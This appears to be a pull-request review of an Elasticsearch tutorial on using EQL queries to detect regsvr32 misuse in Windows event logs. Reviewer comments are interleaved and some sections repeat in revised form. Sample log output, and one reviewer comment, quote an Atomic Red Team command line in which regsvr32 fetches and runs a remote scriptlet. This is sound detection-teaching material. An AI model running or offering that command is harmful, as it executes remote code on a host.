[DOCS] EQL: Add threat detection example (#59105)
elastic/elasticsearch: docs/reference/eql/detect-threats-with-eql.asciidoc

[role="xpack"]
[testenv="basic"]
[[eql-ex-threat-detection]]
== Example: Detect threats with EQL

experimental::[]

This example tutorial shows you how you can use EQL to detect security threats
and other suspicious behavior.

In the scenario, you're tasked with detecting

> https://attack.mitre.org/techniques/T1117/[regsvr32 misuse] in Windows event

Reviewer: The ATT&CK taxonomy has slightly changed since this original PR, so this is the new link. They left in redirects though, so the old one still works, but this is where it redirects to.
```suggestion
https://attack.mitre.org/techniques/T1218/010/[regsvr32 misuse] in Windows event
```

----
// NOTCONSOLE

. Use the <<cat-indices,cat indices API>> to verify the dataset was indexed
successfully.
+
[source,console]
----
GET /_cat/indices/my-index-000001?v&h=health,status,index,docs.count
----
// TEST[setup:atomic_red_regsvr32]
+
The API returns the following response. The `docs.count` value should show `150`
documents were indexed.
+
[source,txt]
----
health status index            docs.count
yellow open   my-index-000001         150
----
// TESTRESPONSE[non_json]

[discrete]
[[eql-ex-get-a-count-of-regsvr32-events]]
=== Get a count of `regsvr32.exe` events

Since you're looking for `regsvr32` misuse, start by getting a count of events
using `regsvr32.exe`.

The following <<eql-search-api,EQL search API>> request uses an EQL query to
retrieve a count of events with a `process.name` of `regsvr32.exe`. The query
starts with the <<eql-syntax-match-any-event-category,`any where` keywords>>,
meaning the query can match events of any <<eql-required-fields,event
category>>.

[source,console]
----
GET /my-index-000001/_eql/search?filter_path=-hits.events  <1>
{
  "query": """
    any where process.name == "regsvr32.exe"        <2>
  """,

>   "size": 150                                       <3>

Reviewer: Should this number be increased, since we already know there are 150?

}
----
// TEST[setup:atomic_red_regsvr32]

<1> Uses the `?filter_path=-hits.events` query parameter to exclude the
`hits.events` property from the response. The `hits.events` property contains
the document source for any matching events. This request is intended to
retrieve a count of events only.
<2> Uses an EQL query to match events with a `process.name` of `regsvr32.exe`.
<3> Returns up to 150 events or sequences matching the EQL query.

The request returns the following response, indicating that 143 events match the
query.

[source,console-result]
----
{
  "is_partial": false,
  "is_running": false,
  "took": 60,
  "timed_out": false,
  "hits": {
    "total": {
      "value": 143,
      "relation": "eq"
    }
  }
}
----
// TESTRESPONSE[s/"took": 60/"took": $body.took/]

[discrete]
[[eql-ex-check-for-command-line-artifacts]]
=== Check for command line artifacts

Your previous query matched 143 events. Many of these events are likely to be

> false positives.

Reviewer: I wouldn't say they are false positives, but more that they are superfluous. Like you know all the things that regsvr32.exe did -- it loaded some DLLs, dropped some files, made a network connection. But maybe it's better to show in this example that you want to know _how regsvr32.exe was called in the first place_. That's often the context you want to know when hunting -- where did this come from, and how?

I think by articulating that goal, it makes it more clear why you want to look for the process creation event: it contains `user.name`, which says what user executed the process, as well as `process.parent.name`, so you know where it came from, and `process.command_line`, which gives you information of everything that regsvr32.exe was  told to do. That's why we end up valuing the process creation events so much.

I think if you add those points, it'll add more punch/story and insight into the thought process to the example.

To narrow down the results, check if the command line was used during any of

> these events. Append `and process.command_line > 0` to the previous EQL query.

Reviewer: ```suggestion
these events. Append `and process.command_line != null` to the previous EQL query.
```
I think it's also worth mentioning `event.category`, and by switching to `process where ...` you filter by category of `process`

This limits matching results to events that contain a `process.command_line`
value.

You'll also need to remove the `filter_path=-hits.events` query parameter. This
lets you retrieve the document source for any matching events.

[source,console]
----
GET /my-index-000001/_eql/search
{
  "query": """

>     any where process.name == "regsvr32.exe" and process.command_line > 0

Reviewer: Alternatively, we could do `process where ...` right?
```suggestion
    any where process.name == "regsvr32.exe" and process.command_line != null
```

  """,
  "size": 150
}
----
// TEST[setup:atomic_red_regsvr32]

The query matches one event. Based on the event's `process.command_line` value,
`regsvr32.exe` was used to register a script as `scrobj.dll`. This fits known

> regsvr32 misuse behavior.

Reviewer: This specific variant is called "Squibblydoo." You don't have to include that name, but another pointer back to https://attack.mitre.org/techniques/T1218/010/ could be good here, if you want to "read on for more information"  about how this works.

            },
            "name": "regsvr32.exe",
            "pid": 2012,
            "entity_id": "{42FC7E13-CBCB-5C05-0000-0010A0395401}",
            "command_line": "regsvr32.exe  /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll",
            "executable": "C:\\Windows\\System32\\regsvr32.exe",
            "ppid": 2652
          },
          "logon_id": 217055,
          "@timestamp": 131883573237130000,
          "event": {
            "category": "process",
            "type": "creation"
          },
          "user": {
            "full_name": "bob",
            "domain": "ART-DESKTOP",
            "id": "ART-DESKTOP\\bob"
          }
        }
      }
    ]
  }
}
----
// TESTRESPONSE[s/"took": 21/"took": $body.took/]
// TESTRESPONSE[s/"_id": "gl5MJXMBMk1dGnErnBW8"/"_id": $body.hits.events.0._id/]

[discrete]
[[eql-ex-check-for-malicious-script-loads]]
=== Check for malicious script loads

You now know that `regsvr32.exe` was used to register
a potentially malicious script as `scrob.dll`. Next, find any processes that
later load the `scrob.dll` file.

Modify the previous EQL query as follows:

> * Change the `any` keyword to `file`. This means the query only matches

Reviewer: I'll have to have another look at this dataset. I think that event is mapped as `file` when it should be library. I'll see if I can update it for you, and come back to this example.

[source,console-result]
----
{
  "is_partial": false,
  "is_running": false,
  "took": 5,
  "timed_out": false,
  "hits": {
    "total": {
      "value": 1,
      "relation": "eq"
    },
    "events": [
      {
        "_index": "my-index-000001",
        "_id": "ol5MJXMBMk1dGnErnBW8",
        "_score": null,
        "_source": {
          "process": {
            "name": "regsvr32.exe",
            "pid": 2012,
            "entity_id": "{42FC7E13-CBCB-5C05-0000-0010A0395401}",
            "executable": "C:\\Windows\\System32\\regsvr32.exe"
          },
          "file": {
            "path": "C:\\Windows\\System32\\scrobj.dll",
            "name": "scrobj.dll"
          },
          "@timestamp": 131883573237450016,
          "event": {
            "category": "file"
          }
        }
      }
    ]
  }
}
----
// TESTRESPONSE[s/"took": 5/"took": $body.took/]
// TESTRESPONSE[s/"_id": "ol5MJXMBMk1dGnErnBW8"/"_id": $body.hits.events.0._id/]

[discrete]
[[eql-ex-detemine-likelihood-of-sucess]]
=== Determine likelihood of success

In many cases, malicious scripts are used to download other remote files. If
this occurred, the attack progressed and might have succeeded.

> Use an <<eql-sequences,EQL sequence query>> to check for the following series of

Reviewer: Could add a note that based off the command line we saw earlier (`regsvr32.exe  /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll`) that we expect to find a match.

One reason why you might want to write a sequence here, is that it allows you to write the detection more generically and you don't have to overfit to the command line. The sequence looks for all the things that are suspicious, but they're also generic, so you're more likely to detect future variants as well.

events, in order:

> . A `regsvr32.exe` process, which could have been used to register malicious
> scripts as `scrobj.dll`
> . A load of the `scrobj.dll` file
> . Any network event, which could indicate the download of a remote file

Reviewer: Change to however you want to communicate this
```suggestion
. A `regsvr32.exe` process, which could have been used to register malicious
scripts as `scrobj.dll`
. A load of the `scrobj.dll` file by that same process
. Any network event by that same process, which could indicate the download of a remote file
```

=== Determine likelihood of success

In many cases, malicious scripts are used to download other remote files. If
this occurred, the attack progressed and might have succeeded.

Use an <<eql-sequences,EQL sequence query>> to check for the following series of
events, in order:

. A `regsvr32.exe` process, which could have been used to register malicious
scripts as `scrobj.dll`
. A load of the `scrobj.dll` file
. Any network event, which could indicate the download of a remote file

To match, each event in the sequence must share the same `process.pid` (process
ID) field value.

[source,console]
----
GET /sec_logs/_eql/search
{
  "query": """
    sequence by process.pid
      [process where process.name == 'regsvr32.exe']
      [file where file.name == 'scrobj.dll']
      [network where true]
  """,
  "size": 150
}
----
// TEST[setup:sec_logs]

The query matches a sequence, indicating the attack likely succeeded.

[source,console-result]
----
{
  "is_partial": false,
  "is_running": false,
  "took": 25,
  "timed_out": false,
  "hits": {
    "total": {
      "value": 1,
      "relation": "eq"
    },
    "sequences": [
      {
        "join_keys": [

>           "2012"

Reviewer: @costin does this always get turned into a string?

Reviewer 2: I believe so - it looks like a bug. Raised https://github.com/elastic/elasticsearch/issues/59707

----
{
  "is_partial": false,
  "is_running": false,
  "took": 60,
  "timed_out": false,
  "hits": {
    "total": {
      "value": 143,
      "relation": "eq"
    }
  }
}
----
// TESTRESPONSE[s/"took": 60/"took": $body.took/]

[discrete]
[[eql-ex-check-for-command-line-artifacts]]
=== Check for command line artifacts

Based on your previous query, you know `regsvr32` processes were associated with
143 events. But how was first `regsvr32.exe` called? And who called it?

`regsvr32` is a command-line utility so narrowing your results to processes where
the command line was used may help.

First, in the previous EQL query, change the `any` keyword to `process`. This
means the query will only match processes, which have an `event.category` of
`process`.

Next, append `and process.command_line != null` to the query. Now the query will
only match processes with a command line value.

You'll also need to remove the `filter_path=-hits.events` query parameter. This
lets you retrieve the document source for any matching events.

[source,console]
----
GET /my-index-000001/_eql/search
{
  "query": """
    process where process.name == "regsvr32.exe" and process.command_line != null
  """,

>   "size": 150

Reviewer: probably safe to remove

}
----
// TEST[setup:atomic_red_regsvr32]

The query matches one process. The event has an `event.type` of `creation`,
indicating the start of a `regsvr32.exe` process. Based on the

> `process.command_line` value, `regsvr32.exe` was used to register a script as
> `scrobj.dll`. This fits the behavior of a

Reviewer: I believe this is more technically correct
```suggestion
`process.command_line` value, `regsvr32.exe` used to `scrobj.dll` to register a script.
. This fits the behavior of a
```

          "process": {
            "parent": {
              "name": "cmd.exe",
              "entity_id": "{42FC7E13-CBCB-5C05-0000-0010AA385401}",
              "executable": "C:\\Windows\\System32\\cmd.exe"
            },
            "name": "regsvr32.exe",
            "pid": 2012,
            "entity_id": "{42FC7E13-CBCB-5C05-0000-0010A0395401}",
            "command_line": "regsvr32.exe  /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll",
            "executable": "C:\\Windows\\System32\\regsvr32.exe",
            "ppid": 2652
          },
          "logon_id": 217055,
          "@timestamp": 131883573237130000,
          "event": {
            "category": "process",
            "type": "creation"
          },
          "user": {
            "full_name": "bob",
            "domain": "ART-DESKTOP",
            "id": "ART-DESKTOP\\bob"
          }
        }
      }
    ]
  }
}
----
// TESTRESPONSE[s/"took": 21/"took": $body.took/]
// TESTRESPONSE[s/"_id": "gl5MJXMBMk1dGnErnBW8"/"_id": $body.hits.events.0._id/]

[discrete]
[[eql-ex-check-for-malicious-script-loads]]
=== Check for malicious script loads

> You now know that a `regsvr32.exe` process was used to register a potentially
> malicious script as `scrob.dll`. Next, see if `regsvr32.exe` later loads the

Reviewer: ```suggestion
You now know that a `regsvr32.exe` process was used to execute a potentially
malicious script `RegSvr32.sct`. Next, see if `regsvr32.exe` later loads the
```
